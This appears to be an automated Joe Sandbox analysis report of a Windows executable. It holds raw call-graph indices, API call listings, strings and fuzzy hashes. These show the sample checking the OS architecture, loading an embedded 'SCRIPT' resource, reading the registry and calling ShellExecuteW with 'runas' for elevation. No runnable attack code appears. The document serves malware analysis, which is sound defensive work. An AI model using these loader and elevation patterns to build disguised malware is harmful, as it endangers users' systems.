23 API calls 71945->71946 71950 214b58 71945->71950 71946->71945 71947 21515f 23 API calls 71948 214c5e 71947->71948 71948->71885 71949 21515f 23 API calls 71949->71950 71950->71949 71951 214c29 71950->71951 71952 214c6d 23 API calls 71950->71952 71951->71947 71951->71948 71952->71950 71953->71896 71954->71901 71955->71905 71956->71911 71957->71914 71958->71918 71959->71923 71960->71926 71961->71930 71962->71927 71963->71932 71964->71935 71965->71939 71966->71939 71967->71939 71968->71939 71969->71900 71970->71903 71971->71907 71972->71917 71973->71921 71974 232c94 71975 232c99 ___vcrt_initialize_winapi_thunks 71974->71975 71983 233462 71975->71983 71978 232ca7 71980 232caf 71981 232cba 71980->71981 71997 23349e DeleteCriticalSection 71980->71997 71985 23346b 71983->71985 71986 233494 71985->71986 71988 232ca3 71985->71988 71998 2336ef 71985->71998 72003 23349e DeleteCriticalSection 71986->72003 71988->71978 71989 233414 71988->71989 72019 233600 71989->72019 71993 233437 71994 233444 71993->71994 72025 233447 8 API calls ___vcrt_FlsFree 71993->72025 71994->71980 71996 233429 71996->71980 71997->71978 72004 233591 71998->72004 72001 233727 InitializeCriticalSectionAndSpinCount 72002 233712 72001->72002 72002->71985 72003->71988 72005 2335b9 72004->72005 72006 2335b5 72004->72006 72005->72006 72012 2334cd 72005->72012 72006->72001 72006->72002 72009 2335d3 GetProcAddress 72010 2335f0 __crt_fast_encode_pointer 72009->72010 72011 2335e3 __crt_fast_encode_pointer 72009->72011 72010->72006 72011->72006 72017 2334dc try_get_first_available_module 72012->72017 72013 233586 72013->72009 72013->72010 72014 2334f9 LoadLibraryExW 72015 233514 GetLastError 72014->72015 72014->72017 72015->72017 72016 23356f FreeLibrary 72016->72017 72017->72013 72017->72014 72017->72016 72018 233547 LoadLibraryExW 72017->72018 72018->72017 72020 233591 try_get_function 7 API calls 72019->72020 72021 23361a 72020->72021 72022 233633 TlsAlloc 72021->72022 72023 23341e 72021->72023 72023->71996 72024 2336b1 8 API calls try_get_function 72023->72024 72024->71993 72025->71996 72026 213156 72029 213170 72026->72029 72028 21316a 72030 213187 72029->72030 72031 2131eb 72030->72031 72032 21318c 72030->72032 72040 2131e9 72030->72040 72034 2131f1 72031->72034 72035 252dfb 72031->72035 72036 213265 PostQuitMessage 72032->72036 72037 213199 72032->72037 72033 2131d0 DefWindowProcW 72057 2131de 72033->72057 72038 2131f8 72034->72038 72039 21321d SetTimer RegisterWindowMessageW 72034->72039 72065 22e499 25 API calls 72035->72065 72036->72057 72037->72040 72044 252e68 72037->72044 72045 2131ae 72037->72045 72041 213201 KillTimer 72038->72041 72042 252d9c 72038->72042 72043 213246 CreatePopupMenu 72039->72043 72039->72057 72040->72033 72040->72057 72063 2130f2 Shell_NotifyIconW ___scrt_fastfail 72041->72063 72046 252dd7 MoveWindow 72042->72046 72047 252da1 72042->72047 72043->72057 72069 27c161 Shell_NotifyIconW KillTimer SetTimer ___scrt_fastfail 72044->72069 72051 252e4d 72045->72051 72052 2131b9 72045->72052 72046->72057 72053 252dc6 SetFocus 72047->72053 72055 2131c4 72047->72055 72051->72033 72068 270ad7 23 API calls 72051->72068 72052->72055 72056 213253 72052->72056 72053->72057 72054 213263 72054->72057 72055->72033 72055->72057 72066 2130f2 Shell_NotifyIconW ___scrt_fastfail 72055->72066 72064 21326f 35 API calls ___scrt_fastfail 72056->72064 72057->72028 72061 252e41 72067 213837 44 API calls ___scrt_fastfail 72061->72067 72063->72057 72064->72054 72065->72055 72066->72061 72067->72040 72068->72040 72069->72054 72070 2303fb 72071 230407 __FrameHandler3::FrameUnwindToState 72070->72071 72072 230561 72071->72072 72076 230438 72071->72076 72117 23083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 72072->72117 72074 230568 72118 234e52 21 API calls _abort 72074->72118 72084 230477 ___scrt_release_startup_lock 72076->72084 72101 24247d 72076->72101 72077 23056e 72119 234e04 21 API calls _abort 72077->72119 72080 230576 72082 230457 72085 2304a0 ___scrt_is_nonwritable_in_current_image 72084->72085 72086 2304ab 72084->72086 72085->72086 72087 2304c6 ___scrt_is_nonwritable_in_current_image 72086->72087 72088 2304d8 72086->72088 72087->72088 72090 2304d1 72087->72090 72109 230959 72088->72109 72113 234e1a 39 API calls 3 library calls 72090->72113 72092 2304de 72093 2304f3 72092->72093 72114 230992 GetModuleHandleW 72093->72114 72095 2304fa 72095->72074 72096 2304fe 72095->72096 72097 230507 72096->72097 72115 234df5 21 API calls _abort 72096->72115 72116 230040 15 API calls 2 library calls 72097->72116 72100 23050f 72100->72082 72103 242494 72101->72103 72102 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 72104 230451 72102->72104 72103->72102 72104->72082 72105 242421 72104->72105 72106 242450 72105->72106 72107 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 72106->72107 72108 242479 72107->72108 72108->72084 72120 232340 72109->72120 72111 23096c GetStartupInfoW 72112 23097f 72111->72112 72112->72092 72113->72088 72114->72095 72115->72097 72116->72100 72117->72074 72118->72077 72119->72080 72120->72111 72121 242e7d 72129 243162 72121->72129 72124 242e91 72126 242e99 72127 242ea6 72126->72127 72137 242ea9 12 API calls 72126->72137 72130 242fd7 _unexpected 6 API calls 72129->72130 72131 243189 72130->72131 72132 2431a1 TlsAlloc 72131->72132 72133 243192 72131->72133 72132->72133 72134 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 72133->72134 72135 242e87 72134->72135 72135->72124 72136 242df8 21 API calls 2 library calls 72135->72136 72136->72126 72137->72124 72138 211098 72141 2142de 72138->72141 72140 21109d pre_c_initialization 72142 21a961 23 API calls 72141->72142 72143 2142f5 GetVersionExW 72142->72143 72144 216b57 23 API calls 72143->72144 72145 214342 72144->72145 72155 214378 72145->72155 72161 2193b2 23 API calls __fread_nolock 72145->72161 72147 21436c 72162 2137a0 23 API calls 72147->72162 72148 21441b GetCurrentProcess IsWow64Process 72150 214437 72148->72150 72151 253824 GetSystemInfo 72150->72151 72152 21444f LoadLibraryA 72150->72152 72153 214460 GetProcAddress 72152->72153 72154 21449c GetSystemInfo 72152->72154 72153->72154 72157 214470 GetNativeSystemInfo 72153->72157 72158 214476 72154->72158 72155->72148 72156 2537df 72155->72156 72157->72158 72159 214481 72158->72159 72160 21447a FreeLibrary 72158->72160 72159->72140 72160->72159 72161->72147 72162->72155 72163 21105b 72166 21344d 72163->72166 72165 21106a pre_c_initialization 72167 21345d 72166->72167 72168 21a961 23 API calls 72167->72168 72169 213513 72168->72169 72192 213357 72169->72192 72172 2133c6 23 API calls 72173 213535 72172->72173 72174 21515f 23 API calls 72173->72174 72175 213544 72174->72175 72176 21a961 23 API calls 72175->72176 72177 21354d 72176->72177 72178 21a6c3 23 API calls 72177->72178 72179 213556 RegOpenKeyExW 72178->72179 72180 253176 RegQueryValueExW 72179->72180 72183 213578 72179->72183 72181 253193 72180->72181 72182 25320c RegCloseKey 72180->72182 72184 215722 23 API calls 72181->72184 72182->72183 72191 25321e _wcslen 72182->72191 72183->72165 72185 2531b7 RegQueryValueExW 72184->72185 72186 2531d4 72185->72186 72189 2531ee 72185->72189 72188 216b57 23 API calls 72186->72188 72187 214c6d 23 API calls 72187->72191 72188->72189 72189->72182 72190 21515f 23 API calls 72190->72191 72191->72183 72191->72187 72191->72190 72193 251f50 72192->72193 72194 213364 GetFullPathNameW 72193->72194 72195 213386 72194->72195 72196 216b57 23 API calls 72195->72196 72197 2133a4 72196->72197 72197->72172 72198 2490fa 72199 249107 72198->72199 72203 24911f 72198->72203 72236 23f2d9 21 API calls __dosmaperr 72199->72236 72201 24910c 72237 2427ec 27 API calls pre_c_initialization 72201->72237 72205 249117 72203->72205 72206 248c32 72203->72206 72207 248c3e __FrameHandler3::FrameUnwindToState 72206->72207 72208 248c46 72207->72208 72209 248c5e 72207->72209 72239 23f2c6 21 API calls __dosmaperr 72208->72239 72211 248d24 72209->72211 72216 248c97 72209->72216 72246 23f2c6 21 API calls __dosmaperr 72211->72246 72213 248c4b 72240 23f2d9 21 API calls __dosmaperr 72213->72240 72214 248d29 72247 23f2d9 21 API calls __dosmaperr 72214->72247 72218 248ca6 72216->72218 72219 248cbb 72216->72219 72241 23f2c6 21 API calls __dosmaperr 72218->72241 72238 245147 EnterCriticalSection 72219->72238 72221 248cb3 72248 2427ec 27 API calls pre_c_initialization 72221->72248 72223 248cab 72242 23f2d9 21 API calls __dosmaperr 72223->72242 72224 248cc1 72226 248cf2 72224->72226 72227 248cdd 72224->72227 72231 248d45 __fread_nolock 39 API calls 72226->72231 72243 23f2d9 21 API calls __dosmaperr 72227->72243 72229 248c53 __wsopen_s 72229->72205 72233 248ced 72231->72233 72232 248ce2 72244 23f2c6 21 API calls __dosmaperr 72232->72244 72245 248d1c LeaveCriticalSection __wsopen_s 72233->72245 72236->72201 72237->72205 72238->72224 72239->72213 72240->72229 72241->72223 72242->72221 72243->72232 72244->72233 72245->72229 72246->72214 72247->72221 72248->72229 72249 21f7bf 72250 21f7d3 72249->72250 72251 21fcb6 72249->72251 72252 21fcc2 72250->72252 72254 22fddb 23 API calls 72250->72254 72280 21aceb 24 API calls 72251->72280 72281 21aceb 24 API calls 72252->72281 72256 21f7e5 72254->72256 72256->72252 72257 21f83e 72256->72257 72258 21fd3d 72256->72258 72260 221310 196 API calls 72257->72260 72269 21ed9d 72257->72269 72282 281155 23 API calls 72258->72282 72276 21ec76 pre_c_initialization 72260->72276 72263 264b0b 72284 28359c 26 API calls 72263->72284 72267 21fbe3 72267->72269 72270 264bdc 72267->72270 72277 21f3ae 72267->72277 72268 21a961 23 API calls 72268->72276 72285 28359c 26 API calls 72270->72285 72272 230242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 72272->72276 72273 264beb 72286 28359c 26 API calls 72273->72286 72274 2301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 72274->72276 72275 22fddb 23 API calls 72275->72276 72276->72263 72276->72267 72276->72268 72276->72269 72276->72272 72276->72273 72276->72274 72276->72275 72276->72277 72278 2201e0 196 API calls _wcslen 72276->72278 72279 2206a0 44 API calls 72276->72279 72277->72269 72283 28359c 26 API calls 72277->72283 72278->72276 72279->72276 72280->72252 72281->72258 72282->72269 72283->72269 72284->72269 72285->72273 72286->72269

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 233 2142de-21434d call 21a961 GetVersionExW call 216b57 238 253617-25362a 233->238 239 214353 233->239 241 25362b-25362f 238->241 240 214355-214357 239->240 242 253656 240->242 243 21435d-2143bc call 2193b2 call 2137a0 240->243 244 253631 241->244 245 253632-25363e 241->245 249 25365d-253660 242->249 262 2143c2-2143c4 243->262 263 2537df-2537e6 243->263 244->245 245->241 246 253640-253642 245->246 246->240 248 253648-25364f 246->248 248->238 251 253651 248->251 252 253666-2536a8 249->252 253 21441b-214435 GetCurrentProcess IsWow64Process 249->253 251->242 252->253 257 2536ae-2536b1 252->257 255 214494-21449a 253->255 256 214437 253->256 259 21443d-214449 255->259 256->259 260 2536b3-2536bd 257->260 261 2536db-2536e5 257->261 264 253824-253828 GetSystemInfo 259->264 265 21444f-21445e LoadLibraryA 259->265 266 2536bf-2536c5 260->266 267 2536ca-2536d6 260->267 269 2536e7-2536f3 261->269 270 2536f8-253702 261->270 262->249 268 2143ca-2143dd 262->268 271 253806-253809 263->271 272 2537e8 263->272 275 214460-21446e GetProcAddress 265->275 276 21449c-2144a6 GetSystemInfo 265->276 266->253 267->253 277 2143e3-2143e5 268->277 278 253726-25372f 268->278 269->253 280 253715-253721 270->280 281 253704-253710 270->281 273 2537f4-2537fc 271->273 274 25380b-25381a 271->274 279 2537ee 272->279 273->271 274->279 284 25381c-253822 274->284 275->276 285 214470-214474 GetNativeSystemInfo 275->285 286 214476-214478 276->286 287 25374d-253762 277->287 288 2143eb-2143ee 277->288 282 253731-253737 278->282 283 25373c-253748 278->283 279->273 280->253 281->253 282->253 283->253 284->273 285->286 291 214481-214493 286->291 292 21447a-21447b FreeLibrary 286->292 289 253764-25376a 287->289 290 25376f-25377b 287->290 293 253791-253794 288->293 294 2143f4-21440f 288->294 289->253 290->253 292->291 293->253 297 25379a-2537c1 293->297 295 214415 294->295 296 253780-25378c 294->296 295->253 296->253 298 2537c3-2537c9 297->298 299 2537ce-2537da 297->299 298->253 299->253
                                                                                                                                                APIs
                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0021430D
                                                                                                                                                  • Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,002ACB64,00000000,?,?), ref: 00214422
                                                                                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00214429
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214454
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00214466
                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00214474
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0021447B
                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 002144A0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                • API String ID: 3290436268-3101561225
                                                                                                                                                • Opcode ID: 8bff81ab9414dd8875c4cf462b3f75a2591af8c6a2b7923b04f446a2dd2a0be3
                                                                                                                                                • Instruction ID: 68e9de9a00776e5683bff418f55ec1745a0901f8ad5a6a8aa30c3b74dcd6255e
                                                                                                                                                • Opcode Fuzzy Hash: 8bff81ab9414dd8875c4cf462b3f75a2591af8c6a2b7923b04f446a2dd2a0be3
                                                                                                                                                • Instruction Fuzzy Hash: 34A103729AA2C0CFCB11DB697CCC1D87FE46B36740B1858F8E4459BA62D27049B8CB35
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1323 2142a2-2142ba CreateStreamOnHGlobal 1324 2142da-2142dd 1323->1324 1325 2142bc-2142d3 FindResourceExW 1323->1325 1326 2142d9 1325->1326 1327 2535ba-2535c9 LoadResource 1325->1327 1326->1324 1327->1326 1328 2535cf-2535dd SizeofResource 1327->1328 1328->1326 1329 2535e3-2535ee LockResource 1328->1329 1329->1326 1330 2535f4-253612 1329->1330 1330->1326
                                                                                                                                                APIs
                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 002142B2
                                                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002150AA,?,?,00000000,00000000), ref: 002142C9
                                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,002150AA,?,?,00000000,00000000,?,?,?,?,?,?,00214F20), ref: 002535BE
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,002150AA,?,?,00000000,00000000,?,?,?,?,?,?,00214F20), ref: 002535D3
                                                                                                                                                • LockResource.KERNEL32(002150AA,?,?,002150AA,?,?,00000000,00000000,?,?,?,?,?,?,00214F20,?), ref: 002535E6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                • String ID: SCRIPT
                                                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                                                • Opcode ID: 3c3a007a9d82a40ae2ecdb9468dd287d658f4ff1312721fb95e47641610dff6a
                                                                                                                                                • Instruction ID: 4c6772e0a01112904648ddf7c5ed991810e88c3e49dd5a0d78ceed3861e3b646
                                                                                                                                                • Opcode Fuzzy Hash: 3c3a007a9d82a40ae2ecdb9468dd287d658f4ff1312721fb95e47641610dff6a
                                                                                                                                                • Instruction Fuzzy Hash: E1117C70210701BFE7219F65EC48F677BBAEBD6B51F20416AB80696250DF72D8508620
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00212B6B
                                                                                                                                                  • Part of subcall function 00213A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002E1418,?,00212E7F,?,?,?,00000000), ref: 00213A78
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                • GetForegroundWindow.USER32 ref: 00252C10
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?,002D2224), ref: 00252C17
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                                                • String ID: runas
                                                                                                                                                • API String ID: 448630720-4000483414
                                                                                                                                                • Opcode ID: 583111f37846ff325ce6285d08fad523fee4efcb6a0b27068312fa717ca6b0b4
                                                                                                                                                • Instruction ID: 74a5920e7b16435ce212562375f0048da29b7add1e8c207240f1e22e3f4fc463
                                                                                                                                                • Opcode Fuzzy Hash: 583111f37846ff325ce6285d08fad523fee4efcb6a0b27068312fa717ca6b0b4
                                                                                                                                                • Instruction Fuzzy Hash: 8511D2312283459AC704FF20E855AEEB7E99BB6314F44042EB182121A2CF709AFD8B52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,00255222), ref: 0027DBCE
                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0027DBDD
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0027DBEE
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0027DBFA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2695905019-0
                                                                                                                                                • Opcode ID: d50cf9d9a4fe128cbc04b4fa34061f538d8182da2342d906374d3719878cfdbe
                                                                                                                                                • Instruction ID: 6a4f542907c364cb615c4039386603e1615a41298cb9ea2bdbac143ecb656bf0
                                                                                                                                                • Opcode Fuzzy Hash: d50cf9d9a4fe128cbc04b4fa34061f538d8182da2342d906374d3719878cfdbe
                                                                                                                                                • Instruction Fuzzy Hash: 45F0E5308209105782216F7CBC0D8AA37BC9E02334BA0870BF83AC20F0EFB05D64C6D5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0023E505), ref: 0024337E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$FileSystem
                                                                                                                                                • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                • API String ID: 2086374402-595813830
                                                                                                                                                • Opcode ID: 4146428ce496928a518f3ed8b11a22382ce42625d5f4061f5c01ca06006d3080
                                                                                                                                                • Instruction ID: ef715247065ee6eb2dd3d764c8a1c627c6b85988837e9d73628ebdc5c4f32e96
                                                                                                                                                • Opcode Fuzzy Hash: 4146428ce496928a518f3ed8b11a22382ce42625d5f4061f5c01ca06006d3080
                                                                                                                                                • Instruction Fuzzy Hash: F4E0A330B20304EBC314AF54AC06D7EBF90DF02B80B500199FC0587740CD300D2096D5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                                • String ID: p#.
                                                                                                                                                • API String ID: 3964851224-3385838572
                                                                                                                                                • Opcode ID: 73fe3a9e3308371922b0b8de00ca04f7f2698c982ddb7743629c4c696d29f1bc
                                                                                                                                                • Instruction ID: d3eed617f1dad90ca229d7e4e65ad672f0cec6183a3d5deab3b21966c7fa4ca7
                                                                                                                                                • Opcode Fuzzy Hash: 73fe3a9e3308371922b0b8de00ca04f7f2698c982ddb7743629c4c696d29f1bc
                                                                                                                                                • Instruction Fuzzy Hash: 71A279746283419FD714CF24C480B6AB7E1BF99304F24896DE89A8B352D771ECA5CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 002309DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                • Opcode ID: ca02e44bc7d7eb8a85ddb4d5f7d139ac9f1d1ba55452736ccf3f90e736b90aee
                                                                                                                                                • Instruction ID: 05a9182b52d48c61eb8be5851d042debc891f78779f7f5dd471cd548cea9368e
                                                                                                                                                • Opcode Fuzzy Hash: ca02e44bc7d7eb8a85ddb4d5f7d139ac9f1d1ba55452736ccf3f90e736b90aee
                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetInputState.USER32 ref: 0021D807
                                                                                                                                                • timeGetTime.WINMM ref: 0021DA07
                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0021DB28
                                                                                                                                                • TranslateMessage.USER32(?), ref: 0021DB7B
                                                                                                                                                • DispatchMessageW.USER32(?), ref: 0021DB89
                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0021DB9F
                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0021DBB1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
